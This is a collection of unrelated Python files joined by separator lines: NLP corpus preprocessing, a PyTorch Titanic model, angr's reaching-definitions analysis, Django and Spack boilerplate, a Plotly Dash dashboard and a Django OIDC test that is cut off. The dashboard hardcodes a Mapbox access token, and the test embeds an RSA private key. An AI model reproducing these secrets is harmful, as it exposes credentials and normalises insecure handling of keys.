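# Usage sketch (hypothetical paths; mirrors torchvision.datasets.ImageFolder):
#   from torchvision import transforms
#   dataset = ImageFolder_new('/data/train', transform=transforms.ToTensor())
#   img, target = dataset[0]  # image tensor and its class index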
|
"""
django-admin-tools is a collection of extensions/tools for the default django
administration interface, it includes:
* a full featured and customizable dashboard,
* a customizable menu bar,
* tools to make admin theming easier.
"""
VERSION = '0.4.0'
|
# Command line arguments
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('bnc_path', help='The path to the BNC corpus files')
ap.add_argument('dataset_path', help='The path to the dataset directory with the BNC IDs')
ap.add_argument('out_path', help='Where to save the dataset with the sentences from BNC')
args = ap.parse_args()
import logging
logger = logging.getLogger(__name__)
import os
import re
import json
import tqdm
import spacy
import codecs
import xml.etree.ElementTree as ET
from unidecode import unidecode
from allennlp.data.tokenizers import WordTokenizer
def main():
bnc_reader = BNCDatasetReader(args.bnc_path)
dataset = {}
for s in ['train', 'test', 'val']:
in_file = os.path.join(args.dataset_path, f'ids_{s}.jsonl')
logger.info(f'Reading from {in_file}')
dataset[s] = []
with codecs.open(in_file, 'r', 'utf-8') as f_in:
for line in tqdm.tqdm(f_in):
try:
curr_example_json = json.loads(line.strip())
instance = bnc_reader.get_single_instance_from_json(curr_example_json)
if instance is not None:
dataset[s].append(instance)
                except Exception:
                    logger.warning(f'Error in line: {line}')
for s in ['train', 'test', 'val']:
out_file = os.path.join(args.out_path, f'{s}.jsonl')
        logger.info(f'Writing to {out_file}')
with codecs.open(out_file, 'w', 'utf-8') as f_out:
for instance in dataset[s]:
f_out.write(json.dumps(instance) + '\n')
class BNCDatasetReader:
"""
Reads sentences from the BNC corpus given a sentence ID.
If you didn't download the BNC corpus yet, please do so.
"""
def __init__(self, bnc_corpus_path):
self._tokenizer = WordTokenizer()
self.bnc_corpus_path = bnc_corpus_path
self.nlp = spacy.load('en')
def get_single_instance_from_json(self, curr_example_json):
"""
Reads a sentence from the BNC corpus from its ID and returns an item or None if invalid.
"""
instance = None
sentence_id = curr_example_json['bnc_id']
# Get the sentence. The format of the BNCID is: BNC_file_dir/BNC_xml_fileName/sentence_number
items = sentence_id.split('/')
curr_sentence_id = items[-1]
curr_sentence_file_path = '/'.join(items[:-1])
tree = ET.parse(os.path.join(self.bnc_corpus_path, curr_sentence_file_path))
root = tree.getroot()
sentence = ''
for element in root.findall(".//s[@n='{}']".format(curr_sentence_id)):
sentence = ''.join(element.itertext())
if sentence != '':
try:
                # Remove unicode punctuation
                sentence = re.sub(r'\s+', ' ', unidecode(sentence)).lower()
                span_text = curr_example_json['span_text']
                span_text = re.sub(r'\s+', ' ', unidecode(span_text)).lower()
# Lemmatize the sentence
tokens = [t for t in self.nlp(sentence)]
lemmas = [t.lemma_ if t.lemma_ != '-PRON-' else t.lower_ for t in tokens]
lemmas = [lemma if lemma != "n't" else "not" for lemma in lemmas]
# Lemmatize the span.
span_tokens = [t for t in self.nlp(span_text)]
span_lemmas = [t.lemma_ if t.lemma_ != '-PRON-' else t.lower_ for t in span_tokens]
span_lemmas = [lemma if lemma != "n't" else "not" for lemma in span_lemmas]
# Find the span within the sentence
index_within_sentence = [i for i in range(len(lemmas) - len(span_lemmas) + 1) if
lemmas[i:i + len(span_lemmas)] == span_lemmas]
if len(index_within_sentence) > 0:
start_token_index = index_within_sentence[0]
end_token_index = start_token_index + len(span_lemmas) - 1
label = curr_example_json['label']
tokenized_sentence = ' '.join([t.text for t in tokens])
assert(' '.join(lemmas[start_token_index:end_token_index+1]) == span_text)
instance = { 'bnc_id': sentence_id,
'sentence': tokenized_sentence,
'start': start_token_index,
'end': end_token_index,
'span_text': span_text,
'label': label }
else:
lemmatized_sent = ' '.join(lemmas)
lemmatized_span = ' '.join(span_lemmas)
logger.warning(f'Failed to find span. Sentence: "{sentence}", ' +
f'sentence lemmatized: "{lemmatized_sent}", ' +
f'span: "{span_text}", span lemmatized: "{lemmatized_span}"')
except Exception as e:
logger.warning(e)
return instance
if __name__ == '__main__':
main()
|
import torch
import torch.nn as nn
import torchvision.transforms as transforms
import torchvision.datasets as dsets
from torch.autograd import Variable
import numpy as np
import matplotlib.pyplot as plot
import collections
import pandas as pd
def substrings_in_string(big_string, substrings):
for i in range(len(substrings)):
if big_string.find(substrings[i]) != -1:
return i + 1
return 0
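# e.g., substrings_in_string('Braund, Mr. Owen', title_list) -> 2
# (1-based index of the first matching substring, 0 if none matches)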
# Load data
train_df = pd.read_csv('train.csv')
test_df = pd.read_csv('test.csv')
# Preprocessing
train_df['Age'].fillna(train_df['Age'].mean(), inplace=True)
test_df['Age'].fillna(test_df['Age'].mean(), inplace=True)
train_df['Ticket'] = train_df['Ticket'].str.extract(r'(\d+)')
test_df['Ticket'] = test_df['Ticket'].str.extract(r'(\d+)')
train_df['Ticket'].fillna(0, inplace=True)
test_df['Ticket'].fillna(0, inplace=True)
train_df['Ticket'] = pd.to_numeric(train_df['Ticket'])
test_df['Ticket'] = pd.to_numeric(test_df['Ticket'])
title_list=['Mrs', 'Mr', 'Master', 'Miss', 'Major', 'Rev',
'Dr', 'Ms', 'Mlle','Col', 'Capt', 'Mme', 'Countess',
'Don', 'Jonkheer']
cabin_list = ['A', 'B', 'C', 'D', 'E', 'F', 'T', 'G', 'Unknown']
train_df['Title']=train_df['Name'].map(lambda x: substrings_in_string(x, title_list))
train_df['Deck']=train_df['Cabin'].map(lambda x: substrings_in_string(str(x), cabin_list))
train_df['Family_Size']=train_df['SibSp']+train_df['Parch']
train_df['Age*Class']=train_df['Age']*train_df['Pclass']
train_df['Fare_Per_Person']=train_df['Fare']/(train_df['Family_Size']+1)
test_df['Title']=test_df['Name'].map(lambda x: substrings_in_string(x, title_list))
test_df['Deck']=test_df['Cabin'].map(lambda x: substrings_in_string(str(x), cabin_list))
test_df['Family_Size']=test_df['SibSp']+test_df['Parch']
test_df['Age*Class']=test_df['Age']*test_df['Pclass']
test_df['Fare_Per_Person']=test_df['Fare']/(test_df['Family_Size']+1)
train_df.drop(columns=['PassengerId','Ticket','Name','Cabin'], inplace=True)
test_df.drop(columns=['PassengerId','Ticket','Name','Cabin'], inplace=True)
train_df['Embarked'].fillna('D', inplace=True)
test_df['Embarked'].fillna('D', inplace=True)
cleanup_nums = {"Sex": {"male": 0, "female": 1},
"Embarked": {"S": 1, "C": 2, "Q": 3, 'D': 0 }}
train_df.replace(cleanup_nums, inplace=True)
test_df.replace(cleanup_nums, inplace=True)
# train_loader = torch.utils.data.DataLoader(dataset = train_tensor, batch_size = batch_size, shuffle = True)
batch_size = 100
# n_iters = 6000
# num_epochs = n_iters / (len(train_dataset) / batch_size)
# num_epochs = int(num_epochs)
num_epochs = 20000
input_dim = 12
output_dim = 2
train_target = torch.tensor(train_df['Survived'].values[0:700])
train = torch.tensor(train_df.drop('Survived', axis = 1).values[0:700])
train_tensor = torch.utils.data.TensorDataset(train, train_target)
train_loader = torch.utils.data.DataLoader(dataset=train_tensor,
batch_size=batch_size,
shuffle=True)
val_target = torch.tensor(train_df['Survived'].values[700:-1])
val = torch.tensor(train_df.drop('Survived', axis = 1).values[700:-1])
val_tensor = torch.utils.data.TensorDataset(val, val_target)
val_loader = torch.utils.data.DataLoader(dataset=val_tensor,
                                         batch_size=batch_size,
                                         shuffle=False)
test = torch.tensor(test_df.values.astype(np.float64))
test_tensor = torch.utils.data.TensorDataset(test)
test_loader = torch.utils.data.DataLoader(dataset=test_tensor,
shuffle=False)
isinstance(train_loader, collections.Iterable)
class LogisticRegressionModel(nn.Module):
def __init__(self, input_dim, hidden_layers, output_dim, activation_layer):
super(LogisticRegressionModel, self).__init__()
self.input_layer = nn.Linear(input_dim, hidden_layers[0])
self.linears = nn.ModuleList([nn.Linear(hidden_layers[i-1], hidden_layers[i]) for i in range(1, len(hidden_layers))])
self.output_layer = nn.Linear(hidden_layers[-1], output_dim)
if activation_layer == 'relu':
self.activation_layer = nn.ReLU()
elif activation_layer == 'sigmoid':
self.activation_layer = nn.Sigmoid()
def forward(self,x):
out = self.input_layer(x)
out = self.activation_layer(out)
for i in range(len(self.linears)):
out = self.linears[i](out)
out = self.activation_layer(out)
out = self.output_layer(out)
return out
hidden_layers = [35, 35, 35]
activation_layer = 'relu'
model = LogisticRegressionModel(input_dim, hidden_layers, output_dim, activation_layer)
model = model.double()
if torch.cuda.is_available():
model.cuda()
criterion = nn.CrossEntropyLoss()
learning_rate = 0.005
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)
iter = 0
for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
if torch.cuda.is_available():
images = Variable(images.view(-1, input_dim).cuda())
labels = Variable(labels.cuda())
else:
images = Variable(images.view(-1, input_dim))
labels = Variable(labels)
# Clear gradients w.r.t. parameters
optimizer.zero_grad()
# Forward pass to get output/logits
outputs = model(images)
# Calculate Loss: softmax --> cross entropy loss
loss = criterion(outputs, labels)
# Getting gradients w.r.t. parameters
loss.backward()
# Updating parameters
optimizer.step()
iter += 1
if iter %100 == 0:
            print('Iteration: {}. Loss: {}'.format(iter, loss.item()))
if iter %500 == 0:
# Calculate Accuracy
correct = 0
total = 0
# Iterate through test dataset
for i, (images, labels) in enumerate(val_loader):
if torch.cuda.is_available():
images = Variable(images.view(-1, input_dim).cuda())
labels = Variable(labels.cuda())
else:
images = Variable(images.view(-1, input_dim))
labels = Variable(labels)
# Forward pass only to get logits/output
outputs = model(images)
# Get predictions from the maximum value
_, predicted = torch.max(outputs.data, 1)
# Total number of labels
                total += labels.size(0)
correct += (predicted.cpu() == labels.cpu()).sum()
accuracy = 100 * correct / total
# Print Loss
            print('Iteration: {}. Loss: {}. Accuracy: {}'.format(iter, loss.item(), accuracy))
# Iterate through test dataset
id = 892
for images in test_loader:
if torch.cuda.is_available():
images = Variable(images[0].view(-1, input_dim).cuda())
else:
images = Variable(images[0].view(-1, input_dim))
# Forward pass only to get logits/output
outputs = model(images)
# Get predictions from the maximum value
_, predicted = torch.max(outputs.data, 1)
print(str(id) + "," + str(int(predicted.cpu())))
id += 1
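# Optional sketch: write the same predictions to a Kaggle-style submission
# file instead of printing them. This assumes pandas was imported as `pd`
# earlier in this script; the PassengerId/Survived column names follow the
# standard Titanic submission format and are an assumption here.
preds = []
for batch in test_loader:
    if torch.cuda.is_available():
        x = Variable(batch[0].view(-1, input_dim).cuda())
    else:
        x = Variable(batch[0].view(-1, input_dim))
    _, batch_preds = torch.max(model(x).data, 1)
    preds.extend(batch_preds.cpu().tolist())
submission = pd.DataFrame({'PassengerId': range(892, 892 + len(preds)),
                           'Survived': preds})
submission.to_csv('submission.csv', index=False)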
|
import logging
from typing import Optional, DefaultDict, Dict, Tuple, Set, Any, Union, TYPE_CHECKING
from collections import defaultdict
import ailment
import pyvex
from ...block import Block
from ...codenode import CodeNode
from ...engines.light import SimEngineLight
from ...knowledge_plugins.functions import Function
from ...knowledge_plugins.key_definitions import ReachingDefinitionsModel, LiveDefinitions
from ...knowledge_plugins.key_definitions.constants import OP_BEFORE, OP_AFTER
from ...misc.ux import deprecated
from ..analysis import Analysis
from ..forward_analysis import ForwardAnalysis
from .engine_ail import SimEngineRDAIL
from .engine_vex import SimEngineRDVEX
from .rd_state import ReachingDefinitionsState
from .subject import Subject
if TYPE_CHECKING:
from .dep_graph import DepGraph
l = logging.getLogger(name=__name__)
class ReachingDefinitionsAnalysis(ForwardAnalysis, Analysis): # pylint:disable=abstract-method
"""
ReachingDefinitionsAnalysis is a text-book implementation of a static data-flow analysis that works on either a
function or a block. It supports both VEX and AIL. By registering observers to observation points, users may use
this analysis to generate use-def chains, def-use chains, and reaching definitions, and perform other traditional
data-flow analyses such as liveness analysis.
* I've always wanted to find a better name for this analysis. Now I gave up and decided to live with this name for
the foreseeable future (until a better name is proposed by someone else).
* Aliasing is definitely a problem, and I forgot how aliasing is resolved in this implementation. I'll leave this
as a post-graduation TODO.
* Some more documentation and examples would be nice.
"""
def __init__(self, subject=None, func_graph=None, max_iterations=3, track_tmps=False,
observation_points=None, init_state: ReachingDefinitionsState=None, cc=None, function_handler=None,
current_local_call_depth=1, maximum_local_call_depth=5, observe_all=False, visited_blocks=None,
dep_graph: Optional['DepGraph']=None, observe_callback=None):
"""
:param Block|Function subject: The subject of the analysis: a function, or a single basic block.
:param func_graph: Alternative graph for function.graph.
:param int max_iterations: The maximum number of iterations before the analysis is terminated.
:param Boolean track_tmps: Whether or not temporary variables should be taken into consideration
during the analysis.
:param iterable observation_points: A collection of tuples of ("node"|"insn", ins_addr, OP_TYPE) defining
where reaching definitions should be copied and stored. OP_TYPE can be
OP_BEFORE or OP_AFTER.
:param init_state: An optional initialization state. The analysis creates and works on a
copy.
                                           Defaults to None: the analysis then initializes its own abstract state,
                                           based on the given <Subject>.
:param SimCC cc: Calling convention of the function.
:param list function_handler: Handler for functions, naming scheme: handle_<func_name>|local_function(
<ReachingDefinitions>, <Codeloc>, <IP address>).
:param int current_local_call_depth: Current local function recursion depth.
:param int maximum_local_call_depth: Maximum local function recursion depth.
:param Boolean observe_all: Observe every statement, both before and after.
:param visited_blocks: A set of previously visited blocks.
:param dep_graph: An initial dependency graph to add the result of the analysis to. Set it
to None to skip dependency graph generation.
"""
self._subject = Subject(subject, self.kb.cfgs['CFGFast'], func_graph, cc)
self._graph_visitor = self._subject.visitor
ForwardAnalysis.__init__(self, order_jobs=True, allow_merging=True, allow_widening=False,
graph_visitor=self._graph_visitor)
self._track_tmps = track_tmps
self._max_iterations = max_iterations
self._observation_points = observation_points
self._init_state = init_state
self._function_handler = function_handler
self._current_local_call_depth = current_local_call_depth
self._maximum_local_call_depth = maximum_local_call_depth
self._dep_graph = dep_graph
if self._init_state is not None:
self._init_state = self._init_state.copy()
self._init_state.analysis = self
self._observe_all = observe_all
self._observe_callback = observe_callback
# sanity check
if self._observation_points and any(not type(op) is tuple for op in self._observation_points):
raise ValueError('"observation_points" must be tuples.')
if type(self) is ReachingDefinitionsAnalysis and \
not self._observe_all and \
not self._observation_points and \
not self._observe_callback:
l.warning('No observation point is specified. '
'You cannot get any analysis result from performing the analysis.'
)
self._node_iterations: DefaultDict[int, int] = defaultdict(int)
self._engine_vex = SimEngineRDVEX(self.project, self._current_local_call_depth, self._maximum_local_call_depth,
functions=self.kb.functions,
function_handler=self._function_handler)
self._engine_ail = SimEngineRDAIL(self.project, self._current_local_call_depth, self._maximum_local_call_depth,
function_handler=self._function_handler)
self._visited_blocks: Set[Any] = visited_blocks or set()
self.model: ReachingDefinitionsModel = ReachingDefinitionsModel(
func_addr=self.subject.content.addr if isinstance(self.subject.content, Function) else None)
self._analyze()
@property
def observed_results(self) -> Dict[Tuple[str,int,int],LiveDefinitions]:
return self.model.observed_results
@property
def all_definitions(self):
return self.model.all_definitions
@all_definitions.setter
def all_definitions(self, v):
self.model.all_definitions = v
@property
def all_uses(self):
return self.model.all_uses
@property
def one_result(self):
if not self.observed_results:
raise ValueError('No result is available.')
if len(self.observed_results) != 1:
raise ValueError("More than one results are available.")
return next(iter(self.observed_results.values()))
@property
def dep_graph(self):
return self._dep_graph
@property
def visited_blocks(self):
return self._visited_blocks
@deprecated(replacement="get_reaching_definitions_by_insn")
def get_reaching_definitions(self, ins_addr, op_type):
return self.get_reaching_definitions_by_insn(ins_addr, op_type)
def get_reaching_definitions_by_insn(self, ins_addr, op_type):
key = 'insn', ins_addr, op_type
if key not in self.observed_results:
raise KeyError(("Reaching definitions are not available at observation point %s. "
"Did you specify that observation point?") % key)
return self.observed_results[key]
def get_reaching_definitions_by_node(self, node_addr, op_type):
key = 'node', node_addr, op_type
if key not in self.observed_results:
raise KeyError("Reaching definitions are not available at observation point %s. "
"Did you specify that observation point?" % str(key))
return self.observed_results[key]
def node_observe(self, node_addr: int, state: ReachingDefinitionsState, op_type: int) -> None:
"""
:param node_addr: Address of the node.
:param state: The analysis state.
        :param op_type:  Type of the observation point. Must be one of the following: OP_BEFORE, OP_AFTER.
"""
key = 'node', node_addr, op_type
observe = False
if self._observe_all:
observe = True
elif self._observation_points is not None and key in self._observation_points:
observe = True
elif self._observe_callback is not None:
observe = self._observe_callback('node', addr=node_addr, state=state, op_type=op_type)
if observe:
self.observed_results[key] = state.live_definitions
def insn_observe(self, insn_addr: int, stmt: Union[ailment.Stmt.Statement,pyvex.stmt.IRStmt],
block: Union[Block,ailment.Block], state: ReachingDefinitionsState, op_type: int) -> None:
"""
:param insn_addr: Address of the instruction.
:param stmt: The statement.
:param block: The current block.
:param state: The abstract analysis state.
        :param op_type:  Type of the observation point. Must be one of the following: OP_BEFORE, OP_AFTER.
"""
key = 'insn', insn_addr, op_type
observe = False
if self._observe_all:
observe = True
elif self._observation_points is not None and key in self._observation_points:
observe = True
elif self._observe_callback is not None:
observe = self._observe_callback('insn', addr=insn_addr, stmt=stmt, block=block, state=state,
op_type=op_type)
if not observe:
return
if isinstance(stmt, pyvex.stmt.IRStmt):
# it's an angr block
vex_block = block.vex
# OP_BEFORE: stmt has to be IMark
if op_type == OP_BEFORE and type(stmt) is pyvex.stmt.IMark:
self.observed_results[key] = state.live_definitions.copy()
# OP_AFTER: stmt has to be last stmt of block or next stmt has to be IMark
elif op_type == OP_AFTER:
idx = vex_block.statements.index(stmt)
if idx == len(vex_block.statements) - 1 or type(
vex_block.statements[idx + 1]) is pyvex.IRStmt.IMark:
self.observed_results[key] = state.live_definitions.copy()
elif isinstance(stmt, ailment.Stmt.Statement):
# it's an AIL block
self.observed_results[key] = state.live_definitions.copy()
@property
def subject(self):
return self._subject
#
# Main analysis routines
#
def _pre_analysis(self):
pass
def _initial_abstract_state(self, node) -> ReachingDefinitionsState:
if self._init_state is not None:
return self._init_state
else:
return ReachingDefinitionsState(
self.project.arch, self.subject, track_tmps=self._track_tmps, analysis=self,
)
def _merge_states(self, node, *states):
return states[0].merge(*states[1:])
def _run_on_node(self, node, state: ReachingDefinitionsState):
"""
:param node: The current node.
:param state: The analysis state.
:return: A tuple: (reached fix-point, successor state)
"""
self._visited_blocks.add(node)
engine: SimEngineLight
if isinstance(node, ailment.Block):
block = node
block_key = node.addr
engine = self._engine_ail
elif isinstance(node, (Block, CodeNode)):
block = self.project.factory.block(node.addr, node.size, opt_level=1, cross_insn_opt=False)
block_key = node.addr
engine = self._engine_vex
else:
l.warning("Unsupported node type %s.", node.__class__)
return False, state.copy()
self.node_observe(node.addr, state, OP_BEFORE)
state = state.copy()
state, self._visited_blocks = engine.process(
state,
block=block,
fail_fast=self._fail_fast,
visited_blocks=self._visited_blocks
)
self._node_iterations[block_key] += 1
self.node_observe(node.addr, state, OP_AFTER)
# update all definitions and all uses
self.all_definitions |= state.all_definitions
for use in [state.stack_uses, state.register_uses]:
self.all_uses.merge(use)
if self._node_iterations[block_key] < self._max_iterations:
return True, state
else:
return False, state
def _intra_analysis(self):
pass
def _post_analysis(self):
pass
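# Usage sketch (not part of this module; hedged). The binary path below is
# hypothetical, and a CFGFast model must already exist in the knowledge base,
# since Subject() above looks it up via self.kb.cfgs['CFGFast']:
#
#     import angr
#     from angr.knowledge_plugins.key_definitions.constants import OP_BEFORE
#     proj = angr.Project('/bin/true', auto_load_libs=False)
#     proj.analyses.CFGFast()
#     func = proj.kb.functions['main']
#     rd = proj.analyses.ReachingDefinitions(
#         subject=func,
#         observation_points=[('node', func.addr, OP_BEFORE)],
#     )
#     live_defs = rd.get_reaching_definitions_by_node(func.addr, OP_BEFORE)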
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_template_dev_22776.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
from datetime import datetime
import os
#querying
import pandas as pd
import numpy as np
#plotting
#from plotly.offline import plot #to save graphs as html files, useful when testing
import plotly.graph_objs as go
#dashboarding
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
mapbox_access_token = 'pk.eyJ1Ijoiam9hb2ZvbnNlY2EiLCJhIjoiY2picXB3cDVvMDczYjJ3bzBxNDV3dGI0MSJ9.XpQDNjTuMAM-xckGln0KrA'
app = dash.Dash()
#app.css.append_css({"external_url": "https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.3/css/bootstrap.min.css"})
with open('support/active_keyword', 'r') as kw_filter:
    header_keyword = kw_filter.readline()
keyword = header_keyword.rstrip()
path = '../../Web_Crawler/_data/'
i = open(path + '%s_instagram_posts.csv' % keyword, 'r')
ig_df = pd.read_csv(i)
def drop_minutes_and_seconds(olddate):
new_date = datetime.fromtimestamp(olddate).replace(minute=0, second=0, microsecond=0)
return new_date
ig_df['date'] = ig_df['taken_at'].apply(drop_minutes_and_seconds)
ig_df = ig_df.sort_values(['date'], ascending=False)  # sort_values returns a new frame; assign it back
#yvalues_ig_hist1 = ig_df[['date']].groupby('date').size()
#
#xvalues = []
#for value in ig_df['date']:
# if value not in xvalues:
# xvalues.append(value)
#yvalues = []
#for date in xvalues:
# yvalues.append(yvalues_ig_hist1[date])
#plotting Ig posts
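# one histogram bin per hour across the span of post dates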
diff = (max(ig_df['date'])-min(ig_df['date']))
number_of_bins= (diff.days+1)*24
#first_ig_histogram = [go.Scatter(x=xvalues, y=yvalues)]
ig_histogram = [go.Histogram(x=ig_df['date'], nbinsx=number_of_bins)]
hist_configuration = go.Layout(title='Instagram posts associated with keyword \'%s\'' % keyword, xaxis=dict(title='Hours'), yaxis=dict(title='Count'))
plot_ig_posts = go.Figure(data=ig_histogram, layout=hist_configuration)
#flnm_posts_ig_histogram= keyword + '_posts_ig_histogram.html'
#plot(plot_ig_posts, filename=flnm_posts_ig_histogram, show_link=False, auto_open=False)
i.close()
# =============================================================================
# plotting geomap
# =============================================================================
data = [
go.Scattermapbox(
lat=ig_df['lat'],
lon=ig_df['lng'],
mode='markers',
# marker=go.Marker(
# size=[endpt_size] + [4 for j in range(len(steps) - 2)] + [endpt_size])
text=ig_df['caption_text']
)
]
layout = go.Layout(
title='Location of Posts',
autosize=True,
hovermode='closest',
mapbox=dict(
accesstoken=mapbox_access_token,
bearing=0,
style='dark',
center=dict(
lat=38.7,
lon=-7.98,
),
pitch=0,
zoom=2.2
),
)
wonder_map = go.Figure(data=data, layout=layout)
#plot(wonder_map, filename='scatterplottest.html', show_link=False, auto_open=True)
# =============================================================================
# last plot
# =============================================================================
comments_data_datecount = ig_df.groupby('date').agg({'comment_count': np.sum}).reset_index()
ig_df['postcount']=ig_df['date']
posts_data_datecount = ig_df.groupby('date').agg({'postcount': np.count_nonzero}).reset_index()
comments_plot= go.Bar(x=comments_data_datecount['date'], y=comments_data_datecount['comment_count'], name='Comments')
posts_plot= go.Bar(x=posts_data_datecount['date'] ,y=posts_data_datecount['postcount'], name='Posts' )
bar_chart_layout= go.Layout(title='Number of comments relative to posts', xaxis=dict(title='Days'), yaxis=dict(title='Count'))
bar_chart_content = [posts_plot,comments_plot]
last_bar_chart = go.Figure(data=bar_chart_content, layout=bar_chart_layout)
#plot(last_bar_chart, filename='barplottest.html', show_link=False, auto_open=True)
# =============================================================================
# Creating dashboard
# =============================================================================
app.layout = html.Div([
# html.H1('Hello Dash'),
# html.Div('''Dash: A web application framework for Python.'''),
dcc.Graph(id='overall-plot',figure=last_bar_chart),
html.Div([
dcc.Graph(id='example-graph',figure=wonder_map)
], style={'width': '49%', 'display': 'inline-block'}),
html.Div([
dcc.Graph(id='whatsthisevenfor',figure=plot_ig_posts)
], style={'width': '49%', 'display': 'inline-block'})
])
if __name__ == '__main__':
app.server.run(host='0.0.0.0', port=8051)
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Librsb(AutotoolsPackage):
"""librsb : A shared memory parallel sparse matrix computations
library for the Recursive Sparse Blocks format"""
homepage = "http://librsb.sourceforge.net/"
url = "http://download.sourceforge.net/librsb/librsb-1.3.0.0.tar.gz"
list_url = "https://sourceforge.net/projects/librsb/files/"
version('1.3.0.0', '2ac8725d1f988f57df9383ae6b0bb2ed221ec935187d31ebb62ea95ee868a790')
version('1.2.0.11', '0686be29bbe277e227c6021de6bd0564e4fc83f996b787886437d28048057bc8')
version('1.2.0.10', 'ec49f3f78a7c43fc9e10976593d100aa49b1863309ed8fa3ccbb7aad52d2f7b8')
version('1.2.0.9', 'f421f5d572461601120933e3c1cfee2ca69e6ecc92cbb11baa4e86bdedd3d9fa')
version('1.2.0.8', '8bebd19a1866d80ade13eabfdd0f07ae7e8a485c0b975b5d15f531ac204d80cb')
depends_on('zlib')
conflicts('%apple-clang')
conflicts('%clang')
def configure_args(self):
args = [
'--enable-openmp',
'--with-zlib',
'--enable-fortran-module-install',
'CPPFLAGS={0}'.format(self.spec['zlib'].headers.include_flags),
'CFLAGS=-O3',
'CXXFLAGS=-O3',
'LDFLAGS={0}'.format(self.spec['zlib'].libs.search_flags)
]
return args
|
from copy import deepcopy
import json
from unittest.mock import patch
from django.contrib.auth import get_user_model
from django.test import Client, TestCase, override_settings
from django.urls import reverse
from spid_cie_oidc.entity.models import FederationEntityConfiguration
from spid_cie_oidc.relying_party.models import OidcAuthentication
from spid_cie_oidc.authority.tests.settings import rp_conf
from spid_cie_oidc.provider.tests.settings import op_conf
from spid_cie_oidc.onboarding.tests.authn_request_settings import AUTHN_REQUEST_SPID
from spid_cie_oidc.relying_party.tests.mocked_response import MockedTokenEndPointResponse, MockedUserInfoResponse
STATE = "fyZiOL9Lf2CeKuNT2JzxiLRDink0uPcd"
CODE = "usDwMnEzJPpG5oaV8x3j&"
class RpCallBack(TestCase):
def setUp(self):
self.rp_jwk = {
'kty': 'RSA',
'kid': '19xSsWuFOo5bFBUECA5G3V5GEhC0s7X8TTCEykdzsmo',
'e': 'AQAB',
'n': 'vfzFzFAv4e1IPfH6XMeB_L3f9sRZuaOtRsAs7s6ujGv6PwVMPsdELqd2NzrmKrLih3ZysJ6RoRe87rGZUZu2GbDtZhupCPb-1MuxB810svua9PwCrQK2wADM8q26colAiAOGSt912LUPC6MOYus44xd7TUDtQcsm-3VXWu4DA19NQXOaUh2TRal6GKXr7D8teod0fo736oHTObWoDZ0KdAGlwxI6IbQKpipgTD6lZ3l9L6WSmdLI9T-TyyNV9fW6rNqhnbySCEGkCM-Up6C2GQqLTq76kQNSMGasXrd3qH07KnTLBZsFy4JV4L-ws3zgaB4PLBOdfYAYe-xSp9-H_Q', 'd': 'MYc9FXduFCrko2l6yEcmhvoE8fLcJT4bRQ-CZzswW-EmWtmJt_AAwVzcv6c2K7l4vrHNUmf0NRfYJC3ed1ztiyMJsI3TckfZxSXY39za6HIZQnaUSAAmHkXXKAjMS2Gmlg69KrW4picFZhY7AOSrbuBHP6uGbpmEbxd3D3hvBqiU6cn_TAwbIhsJniTuSYYbvHd8z93QCKBfp_nDMltz6WG8YUXFiqtzRKv62Y4K2J_zjyd7-JKiWEBh5FUNuqZ2txEV3-q6bwoh3lSGA1qZtVgU61CwHqGQK3uxfEGPV68O48NVJNEe4YgNE806IfREgprTe3osGHd2S96s-t8oYQ',
'p': '9pwMs9MCfes5vYzXb8n1BqAL3LGdPp48jg7iKD4mZ6oLpeCbwNqtB7zN24OqrOnP2nREL2ugkSU2bBrsMy1hZ6k2DnN7cZkNgv4CZ_lO35Bc9CF9j1sCTxUnXQknympL8HVZoG2TdxUL0P09TgiBYz8SVH-uxFnlCuVZBLx35Lk',
'q': 'xTjFHi0QGPYSXGgbUN5cl9LOw7K2ifULDbEPiYSnbzd_oVneA-q6BmanMM5CLrj8qKJPy2Cuz3do-ZZPG_SN5AU_x23K9Vga3honcomo7G0cYKi9wGPBKzAMCRNRFHp3f3BAcp6HUJRn02Q_F_xDmXeC8JiPeATSBIDCXv41I2U'
}
data = deepcopy(AUTHN_REQUEST_SPID)
self.rp_config = deepcopy(rp_conf)
authz_entry = dict(
client_id=self.rp_config["metadata"]["openid_relying_party"]["client_id"],
provider=op_conf["sub"],
provider_id=op_conf["sub"],
data=json.dumps(data),
state=STATE,
provider_configuration=op_conf["metadata"]["openid_provider"],
)
OidcAuthentication.objects.create(**authz_entry)
self.rp_config["sub"] = self.rp_config["metadata"]["openid_relying_party"]["client_id"]
FederationEntityConfiguration.objects.create(**self.rp_config)
rp_conf_saved = FederationEntityConfiguration.objects.all().first()
rp_conf_saved.metadata["openid_relying_party"]["jwks"]["keys"][0]["kid"] = rp_conf_saved.jwks[0]["kid"]
rp_conf_saved.save()
self.op_conf = FederationEntityConfiguration.objects.create(**op_conf)
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("requests.post", return_value=MockedTokenEndPointResponse())
@patch("requests.get", return_value=MockedUserInfoResponse())
def test_rp_callback(self, mocked, mocked_2):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {"state": STATE, "code": CODE})
user = get_user_model().objects.first()
self.assertTrue(
user.attributes['fiscal_number'] == "sdfsfs908df09s8df90s8fd0"
)
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("spid_cie_oidc.relying_party.views.process_user_attributes", return_value=None)
@patch("requests.post", return_value=MockedTokenEndPointResponse())
@patch("requests.get", return_value=MockedUserInfoResponse())
def test_rp_callback_no_rp_attr_map(self, mocked, mocked_2, mocked_3):
client = Client()
url = reverse("spid_cie_rp_callback")
res = client.get(url, {"state": STATE, "code": CODE})
self.assertTrue(res.status_code == 403)
@override_settings(HTTP_CLIENT_SYNC=True)
@patch("spid_cie_oidc.relying_party.views.process_user_attributes", return_value=None)
